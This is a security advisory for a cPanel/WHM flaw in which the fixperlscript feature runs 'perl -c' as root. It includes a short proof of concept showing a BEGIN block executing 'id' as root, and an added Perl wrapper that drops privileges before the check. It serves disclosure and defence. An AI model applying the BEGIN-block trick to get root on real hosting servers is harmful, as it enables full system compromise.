cPanel 11.24.7-BETA_34914 - /scripts/fixperlscript runs 'perl -c' as root, allowing for code execution via BEGIN blocks
DESCRIPTION
WHM contains a feature for the root user that checks the syntax of a specified perl script to ensure there are no errors. It does this by passing the '-c' option to the perl binary. Any perl code contained within BEGIN blocks is executed when perl -c is run, because BEGIN blocks run during compilation. Since this feature failed to drop privileges, that code runs as root: a malicious individual could request their webhost to click the link in WHM to check their (trojaned) perl script, completely compromising the local machine.
IMPACT
Full system compromise.
Running perl -c on code without a BEGIN block:
    [root@host ~]# cat test.pl
    #!/usr/bin/perl
    system("/usr/bin/id > /home/user/id.out");
    [root@host ~]# perl -c test.pl ; cat /home/user/id.out
    test.pl syntax OK
    cat: /home/user/id.out: No such file or directory
Running perl -c on code with a BEGIN block:
    [root@host ~]# cat test.pl
    #!/usr/bin/perl
    BEGIN { system("/usr/bin/id > /home/user/id.out"); }
    [root@host ~]# perl -c test.pl ; cat /home/user/id.out
    test.pl syntax OK
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
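MITIGATION SKETCH (added example)
The missing step named in the description is the privilege drop before 'perl -c'. The wrapper below is an added example, not cPanel's code or its actual fix: the function name syntax_check_as_owner and the policy of running the check as the file's owner are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (hypothetical wrapper, not cPanel's code): run `perl -c` as the
# script's owner, so any BEGIN block executes with that user's rights, not root's.
use strict;
use warnings;
use POSIX ();

sub syntax_check_as_owner {
    my ($path) = @_;
    die "absolute path required\n" unless $path =~ m{^/};

    # lstat, not stat: refuse symlinks and anything that is not a regular file.
    my @st = lstat($path) or die "lstat $path: $!\n";
    die "$path: not a regular file\n" unless -f _;
    my ($uid, $gid) = @st[4, 5];
    die "$path: owned by root, refusing to check\n" if $uid == 0;

    defined(my $pid = fork()) or die "fork: $!\n";
    if ($pid == 0) {
        eval {
            if ($> == 0) {
                # Order matters: supplementary groups and gid first, uid last,
                # because after the uid drop the process cannot change groups.
                $) = "$gid $gid";    # sets egid and calls setgroups()
                POSIX::setgid($gid) or die "setgid: $!\n";
                POSIX::setuid($uid) or die "setuid: $!\n";
                # Confirm the drop took effect and cannot be reversed.
                die "privilege drop failed\n"
                    unless POSIX::getuid() == $uid && POSIX::geteuid() == $uid
                        && POSIX::getgid() == $gid && !POSIX::setuid(0);
            }
            # If the caller was not root, the check simply runs as the caller.
            %ENV = (PATH => '/usr/bin:/bin');    # do not pass root's environment
            chdir '/' or die "chdir: $!\n";
            exec { $^X } 'perl', '-c', '--', $path;
            die "exec: $!\n";
        };
        print STDERR $@;
        POSIX::_exit(126);    # child must never return into the caller's code
    }
    waitpid($pid, 0);
    return $? == 0;           # true only if perl -c reported "syntax OK"
}

unless (caller) {
    @ARGV == 1 or die "usage: $0 /absolute/path/to/script.pl\n";
    exit(syntax_check_as_owner($ARGV[0]) ? 0 : 1);
}
```

With this wrapper the BEGIN block from the second transcript still executes, but id.out would record the script owner's uid rather than uid=0.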